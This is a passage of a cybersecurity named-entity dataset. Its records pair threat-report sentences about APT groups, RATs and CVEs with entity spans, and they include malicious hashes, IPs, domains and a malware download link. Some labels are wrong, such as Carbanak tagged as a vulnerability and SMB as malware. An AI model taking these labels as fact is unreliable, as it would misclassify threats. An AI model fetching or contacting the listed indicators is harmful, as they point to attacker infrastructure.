CVE-2016-4117 . APT33 : d5262f1bc42d7d5d0ebedadd8ab90a88d562c7a90ff9b0aed1b3992ec073e2b0 S-SHA2 Quasar RAT . 
The group itself likes to pretend to be a cybersecurity organization as shown in the ransom note below .", "spans": {"Vulnerability: CVE-2015-8651": [[285, 298]], "Vulnerability: CVE-2016-1019": [[301, 314]], "Vulnerability: CVE-2016-4117": [[321, 334]], "Malware: d5262f1bc42d7d5d0ebedadd8ab90a88d562c7a90ff9b0aed1b3992ec073e2b0 S-SHA2 Quasar RAT": [[345, 427]], "Organization: cybersecurity organization": [[472, 498]]}, "info": {"id": "cyberner_stix_valid_000888", "source": "cyberner_stix_valid"}} {"text": "This exercise revealed tons of information about techniques used by FinFisher that we used to make Office 365 ATP more resistant to sandbox detection and Windows Defender ATP to catch similar techniques and generic behaviors . Organizations located in Myanmar and targeted by Spring Dragon have gone unmentioned . The UnInstall command doesn’t remove the malware from the system . While many state-sponsored threat actors engage in spear phishing , ransomware is the preferred weapon of these cybercriminals .", "spans": {"Malware: FinFisher": [[68, 77]], "System: Office 365 ATP": [[99, 113]], "System: Windows Defender ATP": [[154, 174]]}, "info": {"id": "cyberner_stix_valid_000889", "source": "cyberner_stix_valid"}} {"text": "Rooting trojans The Zen authors have also created a rooting trojan . In addition , the NetTraveler toolkit was able to install additional info-stealing malware as a backdoor , and it could be customized to steal other types of sensitive information such as configuration details for an application or computer-aided design files . This tactic exploits users ’ reduced vigilance when reading their own personal email , even when using corporate IT equipment to do so . 
However , users reported that the fix was causing Safari to not connect correctly to major websites like Facebook , Instagram and Zoom , leading Apple to pull back the patch .", "spans": {"Malware: Zen": [[20, 23]], "Organization: Apple": [[613, 618]]}, "info": {"id": "cyberner_stix_valid_000890", "source": "cyberner_stix_valid"}} {"text": "Interestingly , we uncovered several expired job postings of Android reverse engineer from the actor ’ s front business published in 2018 and 2019 . Hackers gained access to a computer in the trading system in September 2014 . We monitored the activities of these groups and the new malware they are creating for over a year . “ Microsoft remediated the issue by first blocking tokens issued with the acquired key and then replacing the key to prevent continued misuse , ” the report states .", "spans": {"System: Android": [[61, 68]]}, "info": {"id": "cyberner_stix_valid_000891", "source": "cyberner_stix_valid"}} {"text": "Unit 42 researchers observed the Quasar RAT being prevented from executing on a Traps-protected client in September 2016 .", "spans": {}, "info": {"id": "cyberner_stix_valid_000892", "source": "cyberner_stix_valid"}} {"text": "After app installation , whenever SWAnalytics senses victims opening up infected applications or rebooting their phones , it silently uploads their entire contacts list to Hangzhou Shun Wang Technologies controlled servers . 
During their previous campaign , we found Confucius using fake romance websites to entice victims into installing malicious Android applications .", "spans": {"Malware: SWAnalytics": [[34, 45]], "System: Android": [[349, 356]]}, "info": {"id": "cyberner_stix_valid_000893", "source": "cyberner_stix_valid"}} {"text": "National political director Finance director Director of strategic communications Director of scheduling Director of travel Traveling press secretary Travel coordinator .", "spans": {}, "info": {"id": "cyberner_stix_valid_000894", "source": "cyberner_stix_valid"}} {"text": "The infrastructure has several layers , although not being very dynamic , still has several layers each one providing some level of protection . Given the use of lure documents designed with social engineering in mind , it is likely that MuddyWater use phishing or spam to target users who are unaware of these documents ' malicious nature . Looks for a Windows device named \\Device\\acpi_010221 . In July 2019 , we discovered an interesting VBScript named Chrome.vbs ( SHA256 : 0C3D4DFA566F3064A8A408D3E1097C454662860BCACFB6675D2B72739CE449C2 ) associated with the Rancor group . Following a three - month lull of activity , Cl0p returned with a vengeance in June and beat out LockBit as the month ’s most active ransomware gang .", "spans": {"System: Windows": [[354, 361]], "Indicator: Chrome.vbs": [[456, 466]], "Indicator: 0C3D4DFA566F3064A8A408D3E1097C454662860BCACFB6675D2B72739CE449C2": [[478, 542]]}, "info": {"id": "cyberner_stix_valid_000895", "source": "cyberner_stix_valid"}} {"text": "Figure 3 . In August 2019 , FireEye released the “ Double Dragon ” report on our newest graduated threat group , APT41 . 
Upload a specific file based on the full path name .", "spans": {"Organization: FireEye": [[28, 35]]}, "info": {"id": "cyberner_stix_valid_000896", "source": "cyberner_stix_valid"}} {"text": "Even if CVE-2015-2546 affected Windows 10 , the exploitation would have required much more technical prowess to succeed ; ultimately , SMEP makes it more difficult for attackers . Attacks on the chemical industry are merely their latest attack wave .", "spans": {"Vulnerability: CVE-2015-2546": [[8, 21]], "Organization: chemical industry": [[195, 212]]}, "info": {"id": "cyberner_stix_valid_000897", "source": "cyberner_stix_valid"}} {"text": "The second Project Spy version has similar capabilities to the first version , with the addition of the following : Stealing notification messages sent from WhatsApp , Facebook , and Telegram Abandoning the FTP mode of uploading the recorded images Aside from changing the app ’ s supposed function and look , the second and third versions ’ codes had little differences . In all , Kaspersky Lab discovered Metel in more than 30 financial institutions . 
For example , according to Kaspersky telemetry , targeted organizations included think tanks and individuals working in various areas related to security and geopolitics .", "spans": {"Malware: Project Spy": [[11, 22]], "System: WhatsApp": [[157, 165]], "System: Facebook": [[168, 176]], "System: Telegram": [[183, 191]], "Organization: Kaspersky Lab": [[382, 395]], "Organization: financial institutions": [[429, 451]], "Organization: Kaspersky": [[481, 490]], "Organization: think tanks": [[535, 546]], "Organization: individuals working in various areas related to security and geopolitics": [[551, 623]]}, "info": {"id": "cyberner_stix_valid_000898", "source": "cyberner_stix_valid"}} {"text": "If the directory creation fails it tries to install into “ %TEMP% ” directory instead .", "spans": {}, "info": {"id": "cyberner_stix_valid_000899", "source": "cyberner_stix_valid"}} {"text": "60 % of devices containing or accessing enterprise data are mobile , and mobile devices tend to include a significant amount of personal and business data , assuming the organization has a bring-your-own-device policy in place . The exploit document carrying this alternate KeyBoy configuration also used a decoy document which was displayed to the user after the exploit launched . On November 10 , 2015 , Lotus Blossom sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs .", "spans": {"Malware: exploit document": [[233, 249]], "Malware: decoy document": [[307, 321]], "Organization: individual": [[455, 465]]}, "info": {"id": "cyberner_stix_valid_000900", "source": "cyberner_stix_valid"}} {"text": "The primary targets , so far , are based in India though other Asian countries such as Pakistan and Bangladesh are also affected . While we did not discuss the surrounding attacks using Bookworm in detail , we have observed threat actors deploying Bookworm primarily in attacks on targets in Thailand . 
The post continues , “ during 2016 , we observed a heavy interest in Angola , exemplified by lure documents indicating targets with suspected ties to oil , money laundering , and other illicit activities . PoetRAT used TLS to encrypt communications over port 143 . QuasarRAT can use port 4782 on the compromised host for TCP callbacks .", "spans": {"Malware: PoetRAT": [[509, 516]], "System: TLS": [[522, 525]], "Malware: QuasarRAT": [[568, 577]]}, "info": {"id": "cyberner_stix_valid_000901", "source": "cyberner_stix_valid"}} {"text": "We have previously observed APT19 steal data from law and investment firms for competitive economic purposes . After reviewing all the malware functionalities , we are confident in saying that the attackers look for victims who answer well-defined characteristics and believe that further stages of the attack are delivered only to those who fit the specific victim profile .", "spans": {"Organization: victims who answer": [[216, 234]]}, "info": {"id": "cyberner_stix_valid_000902", "source": "cyberner_stix_valid"}} {"text": "It captures information using plugins to compromise webcam and microphone output along with documenting log keystrokes , carrying out surveillance and access external drives . For the sake of narrative we are going to focus exclusively to those samples we identified being used in attacks against Iranian civil society and diaspora .", "spans": {"Organization: civil society": [[305, 318]], "Organization: diaspora": [[323, 331]]}, "info": {"id": "cyberner_stix_valid_000903", "source": "cyberner_stix_valid"}} {"text": "The collected data can then be used to generate a unique identifier of the bot or for monetization purposes . PittyTiger has also been seen using Heartbleed vulnerability in order to directly get valid credentials . 
In August 2018 , Unit 42 observed OilRig targeting a government organization using spear-phishing emails to deliver an updated version of a Trojan known as BONDUPDATER .", "spans": {"Vulnerability: Heartbleed vulnerability": [[146, 170]], "Organization: Unit 42": [[233, 240]], "Organization: government organization": [[269, 292]], "Malware: Trojan": [[356, 362]], "Malware: BONDUPDATER": [[372, 383]]}, "info": {"id": "cyberner_stix_valid_000904", "source": "cyberner_stix_valid"}} {"text": "The credentials they use to register their malware infrastructure are easily associated with their public social media accounts on Google® , Facebook® , MySpace® , Instagram® , and various dating and blogging sites . We suspect the Kazuar tool may be linked to the Turla threat actor group ( also known as Uroburos and Snake ) , who have been reported to have compromised embassies , defense contractors , educational institutions , and research organizations across the globe .", "spans": {"Organization: social media": [[106, 118]], "Organization: Google®": [[131, 138]], "Organization: Facebook®": [[141, 150]], "Organization: MySpace®": [[153, 161]], "Organization: Instagram®": [[164, 174]], "Organization: dating and blogging sites": [[189, 214]], "Malware: Kazuar tool": [[232, 243]], "Organization: embassies": [[372, 381]], "Organization: defense contractors": [[384, 403]], "Organization: educational institutions": [[406, 430]], "Organization: research organizations": [[437, 459]]}, "info": {"id": "cyberner_stix_valid_000905", "source": "cyberner_stix_valid"}} {"text": "Instead , they opted for minimal downtime and attempted to continue operations , with only minor modifications to the toolset .", "spans": {}, "info": {"id": "cyberner_stix_valid_000906", "source": "cyberner_stix_valid"}} {"text": "cecilia-gilbert [ . It wasn't until August 2014 that we observed something which made us wonder if RedOctober is back for good . 
As always , keep in mind that these uses are confirmed uses , and likely represent only a small fraction of APT1 ’s total activity . Greatness , for now , is only focused on Microsoft 365 phishing pages , providing its affiliates with an attachment and link builder that creates highly convincing decoy and login pages .", "spans": {}, "info": {"id": "cyberner_stix_valid_000907", "source": "cyberner_stix_valid"}} {"text": "If an attacker wanted to exploit CVE-2015-1701 , they would first have to be executing code on the victim ’s machine .", "spans": {"Vulnerability: CVE-2015-1701": [[33, 46]]}, "info": {"id": "cyberner_stix_valid_000908", "source": "cyberner_stix_valid"}} {"text": "The kill switch can also be turned on by SMS . APT33 may possibly be looking to gain insights on Saudi Arabia 's military aviation capabilities to enhance Iran 's domestic aviation capabilities or to support Iran 's military and strategic decision making vis a vis Saudi Arabia . Secondary ProjectSauron modules are designed to perform specific functions like stealing documents , recording keystrokes , and hijacking encryption keys from both infected computers and attached USB sticks .", "spans": {"Organization: military": [[216, 224]], "Malware: ProjectSauron modules": [[290, 311]]}, "info": {"id": "cyberner_stix_valid_000909", "source": "cyberner_stix_valid"}} {"text": "They do this not only to identify whether the use of a particular app may permit them to harvest another credential , but also because each targeted app needs to have an overlay mapped to its design , so the Trojan can intercept and steal user data . Prior to the discovery of Operation Daybreak , we observed the ScarCruft APT launching a series of attacks in Operation Erebus . Activity of the Chafer APT group has been observed since at least 2015 , but based on things like compilation timestamps and C&C registration, it’s possible they have been active for even . 
McAfee researchers will present their findings at this year 's RSA security conference in San Francisco .", "spans": {"Organization: McAfee researchers": [[570, 588]], "Organization: RSA security conference": [[633, 656]]}, "info": {"id": "cyberner_stix_valid_000910", "source": "cyberner_stix_valid"}} {"text": "Distinct changes to Azazel by the Winnti developers include the addition of a function named ‘Decrypt2’ , which is used to decode an embedded configuration similar to the core implant . Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 .", "spans": {"Organization: Kaspersky Lab": [[186, 199]], "Organization: Microsoft Office": [[223, 239]], "Vulnerability: exploits": [[240, 248]], "Indicator: Exploit.MSWord.CVE-2010-333": [[296, 323]], "Indicator: Exploit.Win32.CVE-2012-0158": [[326, 353]]}, "info": {"id": "cyberner_stix_valid_000911", "source": "cyberner_stix_valid"}} {"text": "However , due to the absence of certification centers verifying the digital signatures of Android programs , nothing prevents criminals from adding their own signature . January 2018 , TAA triggered an alert at a large telecoms operator in Southeast Asia . 100 Root Thu 24 Oct 2019 12:08:27 PM UTC Initial shellcode . 101 Plugins Thu 24 Oct 2019 12:07:02 PM UTC Provides API for the other modules ; loads modules . 102 Config Thu 24 Oct 2019 12:07:09 PM UTC Handles encrypted configuration string pool . 103 Install Thu 24 Oct 2019 12:07:46 PM UTC Achieves persistence . 104 Online Thu 24 Oct 2019 12:07:17 PM UTC Overall communications with the C&C server . 106 ImpUser Thu 24 Oct 2019 12:07:24 PM UTC User impersonation via token duplication . 200 TCP Thu 24 Oct 2019 12:01:01 PM UTC TCP communications . 202 HTTPS Thu 24 Oct 2019 12:01:15 PM UTC HTTPS communications . 207 Pipe Thu 24 Oct 2019 12:01:35 PM UTC Handles named pipes . 
300 Disk Thu 24 Oct 2019 12:02:29 PM UTC File system operations . 301 Process Thu 24 Oct 2019 12:02:36 PM UTC Process handling . 302 Servcie Thu 24 Oct 2019 12:02:45 PM UTC Service handling . 303 Register Thu 24 Oct 2019 12:02:52 PM UTC Registry operations . 304 Shell Thu 24 Oct 2019 12:03:00 PM UTC Command line operations . 306 Keylogger Thu 24 Oct 2019 12:03:16 PM UTC Keylogging to file system . 307 Screen Thu 24 Oct 2019 12:03:25 PM UTC Screenshot capture . 317 RecentFiles Thu 24 Oct 2019 12:04:44 PM UTC Lists recently accessed files . Since early 2022 , KillNet has claimed on multiple occasions to be partnering or coordinating with several criminal elements , including multiple occasions in which it claimed to be working with the widely known ransomware group REvil .", "spans": {"Organization: TAA": [[185, 188]], "Organization: telecoms operator": [[219, 236]], "Indicator: Handles encrypted configuration string pool": [[458, 501]]}, "info": {"id": "cyberner_stix_valid_000912", "source": "cyberner_stix_valid"}} {"text": "This group has been conducting attacks for at least four years using a backdoor Trojan that has been under active development . The APT38 uses DYEPACK to manipulate the SWIFT transaction records and hide evidence of the malicious transactions , so bank personnel are none the wiser when they review recent transactions .", "spans": {"Malware: DYEPACK": [[143, 150]], "Organization: bank personnel": [[248, 262]]}, "info": {"id": "cyberner_stix_valid_000913", "source": "cyberner_stix_valid"}} {"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e. 
, not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 .", "spans": {"Vulnerability: Carbanak": [[20, 28]], "Organization: financial industry": [[145, 163]], "Indicator: BalkanDoor": [[232, 242]], "Vulnerability: exploit": [[391, 398]], "Vulnerability: CVE-2018-20250": [[428, 442]]}, "info": {"id": "cyberner_stix_valid_000914", "source": "cyberner_stix_valid"}} {"text": "We report them to Google and take other steps to disrupt malicious campaigns we discover . In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . It is suspected that spear phishing is the primary delivery mechanism for Volgmer infections ; however , HIDDEN COBRA actors use a suite of custom tools , some of which could also be used to initially compromise a system .", "spans": {"Organization: Google": [[18, 24]], "Organization: government officials": [[119, 139]], "Malware: malicious Microsoft Word document": [[181, 214]], "Vulnerability: CVE-2012-0158": [[234, 247]], "Malware: Volgmer": [[366, 373]], "Malware: custom tools": [[432, 444]]}, "info": {"id": "cyberner_stix_valid_000915", "source": "cyberner_stix_valid"}} {"text": "This leads us to believe that Zen is just part of a larger infection chain . They then moved on to the motor industry in late May . APT17 . A Polish student used a remote controller device to interface with the Lodz city tram system in Poland .", "spans": {"Malware: Zen": [[30, 33]], "Organization: motor industry": [[103, 117]], "System: a remote controller device": [[162, 188]], "System: the Lodz city tram system": [[207, 232]]}, "info": {"id": "cyberner_stix_valid_000916", "source": "cyberner_stix_valid"}} {"text": "Record surroundings using the built-in microphone in 3gp format . 
In other attacks , there was evidence that Felismus was installed using a tool known as Starloader ( detected by Symantec as Trojan.Starloader ) . JhoneRAT : https://drive.google.com/uc?export=download&id=1kbHVkvPIjX49qJ62TBz6drW2YPiiaX2a . The attackers ' aim is to put the organisation in an unbearable position by stopping it from functioning , and then demanding a ransom that can stretch to millions of dollars .", "spans": {"Organization: Symantec": [[179, 187]], "Malware: JhoneRAT": [[213, 221]], "Indicator: https://drive.google.com/uc?export=download&id=1kbHVkvPIjX49qJ62TBz6drW2YPiiaX2a": [[224, 304]]}, "info": {"id": "cyberner_stix_valid_000917", "source": "cyberner_stix_valid"}} {"text": "Among the most popular modern defense mechanisms against APTs are air-gaps — isolated network segments without Internet access , where sensitive data is stored .", "spans": {}, "info": {"id": "cyberner_stix_valid_000918", "source": "cyberner_stix_valid"}} {"text": "However , samples don ’ t have key capabilities to infect innocent apps on victim devices yet . Threat actors like Confucius and Patchwork are known for their large arsenal of tools and ever-evolving techniques that can render traditional security solutions — which are often not designed to handle the persistent and sophisticated threats detailed in this blog — ineffective . Memory scans detect and terminate the loading of malicious code hidden by process hollowing — including the monitoring processes that attempt to update the malware code and re-infect the machine via PowerShell commands . 
• New , unexpected compiled ASPX files in the directory • Reconnaissance , vulnerability - testing requests to the following resources from an external IP address : In our investigations to date , the web shells placed on Exchange Servers have been named differently in each intrusion , and thus the file name alone is not a high - fidelity indicator of compromise .", "spans": {"System: Exchange Servers": [[821, 837]]}, "info": {"id": "cyberner_stix_valid_000919", "source": "cyberner_stix_valid"}} {"text": "The Shadow Brokers first emerged in August , when they posted links to a selection of NSA exploits and hacking tools onto Github and other websites . On April 24 , 2019 , Fxmsp claimed to have secured access to three leading antivirus companies .", "spans": {"Vulnerability: NSA exploits": [[86, 98]], "Organization: antivirus companies": [[225, 244]]}, "info": {"id": "cyberner_stix_valid_000920", "source": "cyberner_stix_valid"}} {"text": "Cannon opens the email with the correct subject and saves the attachment named auddevc.txt .", "spans": {"Malware: Cannon": [[0, 6]], "Indicator: auddevc.txt": [[79, 90]]}, "info": {"id": "cyberner_stix_valid_000921", "source": "cyberner_stix_valid"}} {"text": "Its functionality includes uploading and downloading files , and it has configurable network protocols .", "spans": {}, "info": {"id": "cyberner_stix_valid_000922", "source": "cyberner_stix_valid"}} {"text": "Fighting organized crime in your phone One of the main problems with Triada is that it can potentially hurt a LOT of people . In that case , we observed Buhtrap using a local privilege escalation exploit , CVE-2019-1132 , against one of its victims . 
We assess this activity was carried out by a suspected Iranian cyber espionage threat group , whom we refer to as APT34 , using a custom PowerShell backdoor to achieve its objectives .", "spans": {"Malware: Triada": [[69, 75]], "Vulnerability: CVE-2019-1132": [[206, 219]], "Malware: custom PowerShell backdoor": [[381, 407]]}, "info": {"id": "cyberner_stix_valid_000923", "source": "cyberner_stix_valid"}} {"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id58712 [ . On January 4 , Packet Clearing House , which is not an Internet exchange point but rather is an NGO which provides support to Internet exchange points and the core of the domain name system , provided confirmation of this aspect of the actors’ tactics when it publicly revealed its internal DNS had been briefly hijacked as a consequence of the compromise at its domain registrar . APT19 is a Chinese-based threat group that has targeted a variety of industries , including defense , finance , energy , pharmaceutical , telecommunications , high tech , education , manufacturing , and legal services .", "spans": {}, "info": {"id": "cyberner_stix_valid_000924", "source": "cyberner_stix_valid"}} {"text": "Based on our analysis of Callisto Group 's usage of RCS Galileo , we believe the Callisto Group did not utilize the leaked RCS Galileo source code , but rather used the leaked readymade installers to set up their own installation of the RCS Galileo platform . 
In activity analyzed by CTU researchers , TG-3390 executed the Hunter web application scanning tool against a target server running IIS .", "spans": {"Organization: CTU": [[284, 287]], "Malware: Hunter web application scanning tool": [[323, 359]]}, "info": {"id": "cyberner_stix_valid_000925", "source": "cyberner_stix_valid"}} {"text": "Secondly , when the emails were being sent to a broad set of recipients , the mails purported to be a necessary security update .", "spans": {}, "info": {"id": "cyberner_stix_valid_000926", "source": "cyberner_stix_valid"}} {"text": "Unlike previous samples , this DealersChoice used a DOCX delivery document that required the user to scroll through the document to trigger the malicious Flash object .", "spans": {}, "info": {"id": "cyberner_stix_valid_000927", "source": "cyberner_stix_valid"}} {"text": "Attacks launched by this group were publicly exposed in 2013 in a Trend Micro report about the FakeM Trojan . Other groups attributed to Iranian attackers , such as Rocket Kitten , have targeted Iranian individuals in the past , including anonymous proxy users , researchers , journalists , and dissidents .", "spans": {"Organization: Trend Micro": [[66, 77]], "Organization: anonymous proxy users": [[239, 260]], "Organization: researchers": [[263, 274]], "Organization: journalists": [[277, 288]], "Organization: dissidents": [[295, 305]]}, "info": {"id": "cyberner_stix_valid_000928", "source": "cyberner_stix_valid"}} {"text": "It is possible that TG-3390 is a false-flag operation by a threat group outside of China that is deliberately planting indications of a Chinese origin .", "spans": {}, "info": {"id": "cyberner_stix_valid_000929", "source": "cyberner_stix_valid"}} {"text": "The core of this functionality is also based on an open-source project that can be found here . RCS Galileo platform . On Monday August 25, 2014 we observed a different spear phish email sent from lilywang823@gmail.com to a technology company located in Taiwan . 
Cloud Administration Command APT29 has used Azure Run Command and Azure Admin - on - Behalf - of ( AOBO ) to execute code on virtual machines .", "spans": {"Indicator: lilywang823@gmail.com": [[197, 218]], "System: Azure Run Command": [[307, 324]], "System: Azure Admin - on - Behalf - of ( AOBO )": [[329, 368]]}, "info": {"id": "cyberner_stix_valid_000930", "source": "cyberner_stix_valid"}} {"text": "There ’ s an app for just about any facet of one ’ s personal and professional life , from booking travel and managing projects , to buying groceries and binge-watching the latest Netflix series . Silence 2.0: Going Global is an extension of our original report: Silence: Moving into the Darkside which remains the most significant contribution to the research on the group and is the first such report to reveal Silence’s activity . Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": {"Organization: Netflix": [[180, 187]], "Organization: Going Global": [[210, 222]], "Malware: Carbanak": [[434, 442]], "Organization: consumer": [[510, 518]], "Malware: Carberp": [[610, 617]]}, "info": {"id": "cyberner_stix_valid_000931", "source": "cyberner_stix_valid"}} {"text": "” social ” – this command that starts the ‘ AndroidMDMSupport ’ service – this allows the files of any other installed application to be grabbed . However , Kaspersky Security Network (KSN) records also contain links that victims clicked from the Outlook web client outlook.live.com” as well as attachments arriving through the Outlook desktop application . 
Activity from this group was previously linked to FIN7 , but the group is believed to be a distinct group possibly motivated by espionage .", "spans": {"Organization: Kaspersky": [[157, 166]], "Malware: outlook.live.com”": [[266, 283]]}, "info": {"id": "cyberner_stix_valid_000932", "source": "cyberner_stix_valid"}} {"text": "OnionDuke ’s development therefore could not have been simply a response to the outing of one of the other Duke malware , but was instead intended for use alongside the other toolsets .", "spans": {"Malware: OnionDuke": [[0, 9]]}, "info": {"id": "cyberner_stix_valid_000933", "source": "cyberner_stix_valid"}} {"text": "PLATINUM uses a number of different custom-developed backdoors to communicate with infected computers . Obviously , the developers behind NetTraveler have taken steps to try to hide the malware 's configuration .", "spans": {"Malware: NetTraveler": [[138, 149]]}, "info": {"id": "cyberner_stix_valid_000934", "source": "cyberner_stix_valid"}} {"text": "TONEDEAF supports collecting system information , uploading and downloading of files , and arbitrary shell command execution . In order to fight back against this cyber-espionage , Kaspersky Lab will continue its research .", "spans": {"Malware: TONEDEAF": [[0, 8]], "Organization: Kaspersky Lab": [[181, 194]]}, "info": {"id": "cyberner_stix_valid_000935", "source": "cyberner_stix_valid"}} {"text": "In that case , the only help comes from an antivirus solution , for example , Kaspersky Internet Security for Android . But two tools used were unique to the group : ASPXTool , an Internet Information Services ( IIS ) specific \" Web shell \" used to gain access to servers inside a target 's network ; and the OwaAuth credential stealing tool and Web shell , used to attack Microsoft Exchange servers running the Web Outlook interface . 
ShadowPad is a multimodular backdoor where the modules are referenced from the Root module with a circular list from which one can extract the module address , a UNIX timestamp ( probably embedded automatically during the module ’s compilation process ) and a module identifier . DLL sideloading attacks use the DLL search order mechanism in Windows to plant and then invoke a legitimate application that executes a malicious payload .", "spans": {"System: Kaspersky Internet Security": [[78, 105]], "System: Android": [[110, 117]], "Malware: ShadowPad": [[436, 445]], "Malware: backdoor": [[464, 472]], "System: UNIX": [[598, 602]]}, "info": {"id": "cyberner_stix_valid_000936", "source": "cyberner_stix_valid"}} {"text": "In the first iteration , the screen recording is started and will only stop when the RAT determines that WhatsApp is not running . These spear phishing emails were crafted to appear highly convincing , including being sent from legitimate email accounts suspected to have been previously compromised by the Callisto Group via credential phishing . The HIGHTIDE backdoor connected directly to 141.108.2.157 . [ 42 ] TYPEFRAME has used ports 443 , 8080 , and 8443 with a FakeTLS method .", "spans": {"System: WhatsApp": [[105, 113]], "Malware: HIGHTIDE backdoor": [[352, 369]], "Indicator: 141.108.2.157": [[392, 405]], "Malware: TYPEFRAME": [[415, 424]]}, "info": {"id": "cyberner_stix_valid_000937", "source": "cyberner_stix_valid"}} {"text": "TG-3390 is capable of using a C2 infrastructure that spans multiple networks and registrars .", "spans": {}, "info": {"id": "cyberner_stix_valid_000938", "source": "cyberner_stix_valid"}} {"text": "As we 've seen with actors like Dark Caracal , this low cost , low sophistication approach that relies heavily upon social engineering has still been shown to be highly successful for those operating such campaigns . 
We believe that Lazarus will remain one of the biggest threats to the banking sector , finance , and trading companies , as well as casinos for the next few years . The exploit was used against one target in the chemical sector in Saudi Arabia . csvde.exe", "spans": {"Malware: Dark Caracal": [[32, 44]], "Organization: banking sector": [[287, 301]], "Organization: finance": [[304, 311]], "Organization: trading companies": [[318, 335]], "Organization: casinos": [[349, 356]]}, "info": {"id": "cyberner_stix_valid_000939", "source": "cyberner_stix_valid"}} {"text": "Understand firewalls .", "spans": {}, "info": {"id": "cyberner_stix_valid_000940", "source": "cyberner_stix_valid"}} {"text": "Through research , 360 Helios Team has found that , since 2007 , the Poison Ivy Group has carried out 11 years of cyber espionage campaigns against Chinese key units and departments , such as national defense , government , science and technology , education and maritime agencies . The malware has started targeting corporate , SMB , investment banking and consumer accounts at banks , including some in Portugal and the U.S. , in addition to Poland , according to researchers at IBM 's X-Force team .", "spans": {"Organization: 360 Helios Team": [[19, 34]], "Organization: national defense": [[192, 208]], "Organization: government": [[211, 221]], "Organization: science": [[224, 231]], "Organization: technology": [[236, 246]], "Organization: education": [[249, 258]], "Organization: maritime agencies": [[263, 280]], "Malware: SMB": [[329, 332]], "Organization: investment banking": [[335, 353]], "Organization: banks": [[379, 384]], "Organization: IBM 's X-Force": [[481, 495]]}, "info": {"id": "cyberner_stix_valid_000941", "source": "cyberner_stix_valid"}} {"text": "\" Emboldened by financial and technological independence , their skillsets will advance–putting end users , enterprises , and government agencies at risk . 
Just last week Lazarus were found stealing millions from ATMs across Asia and Africa . APT33 : 5.187.21.70 microsoftupdated.com . This seeming “ streamlining ” of activities by DPRK often makes it difficult for defenders to track , attribute , and thwart malicious activities , while enabling this now collaborative adversary to move stealthily and with greater speed .", "spans": {"Indicator: 5.187.21.70": [[251, 262]], "Indicator: microsoftupdated.com": [[263, 283]]}, "info": {"id": "cyberner_stix_valid_000942", "source": "cyberner_stix_valid"}} {"text": "Command and control API calls ViperRAT samples are capable of communicating to C2 servers through an exposed API as well as websockets . The subject is a series of targeted attacks against private companies . Finally , it spawns the main thread that starts at the original location of ShellMainThread procedure , and terminates . In October 2019 , ESET published “ Operation Ghost ” detailing a set of new trojans used by the Dukes , including PolyglotDuke , RegDuke and FatDuke .", "spans": {"Malware: ViperRAT": [[30, 38]], "Organization: private companies": [[189, 206]], "Malware: PolyglotDuke": [[444, 456]], "Malware: RegDuke": [[459, 466]], "Malware: FatDuke": [[471, 478]]}, "info": {"id": "cyberner_stix_valid_000943", "source": "cyberner_stix_valid"}} {"text": "] cendata [ . In addition to banks , the MoneyTaker group has attacked law firms and also financial software vendors . APT16 . The web shell was written to the system by the UMWorkerProcess.exe process , which is associated with Microsoft Exchange Server ’s Unified Messaging service .", "spans": {"Organization: banks": [[29, 34]], "Organization: law firms": [[71, 80]], "System: Microsoft Exchange Server ’s Unified Messaging service": [[229, 283]]}, "info": {"id": "cyberner_stix_valid_000944", "source": "cyberner_stix_valid"}} {"text": "A business can obtain access to this program only provided they meet requirements set out by Apple . 
The worm leverages an SMBv1 exploit that originates from tools released by the Shadow Brokers threat group in April . In March 2018 , Trend Micro provided a detailed analysis of another campaign that bore the hallmarks of MuddyWater .", "spans": {"Organization: Apple": [[93, 98]], "Vulnerability: SMBv1 exploit": [[123, 136]], "Organization: Trend Micro": [[235, 246]]}, "info": {"id": "cyberner_stix_valid_000945", "source": "cyberner_stix_valid"}} {"text": "The C2 for the aforementioned 9002 sample was logitechwkgame [ . Mapping the group’s activities since 2012 (Figure 2) also provides some indication that APT41 primarily conducts financially motivated operations outside of their normal day jobs . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe , \" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia .", "spans": {"Malware: 9002": [[30, 34]], "Indicator: Vietnam.exe": [[360, 371]], "Organization: diaspora": [[431, 439]]}, "info": {"id": "cyberner_stix_valid_000946", "source": "cyberner_stix_valid"}} {"text": "After obtaining the desired rights , the Trojan sets itself as the default SMS app ( by independently clicking Yes in AccessibilityService ) , before vanishing from the device screen . In May and June 2017 , FireEye has associated this campaign with APT19 , a group that we assess is composed of freelancers , with some degree of sponsorship by the Chinese government . Indicating that this library was probably used in another campaign .", "spans": {"Organization: FireEye": [[208, 215]], "Organization: Chinese government": [[349, 367]]}, "info": {"id": "cyberner_stix_valid_000947", "source": "cyberner_stix_valid"}} {"text": "As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware . 
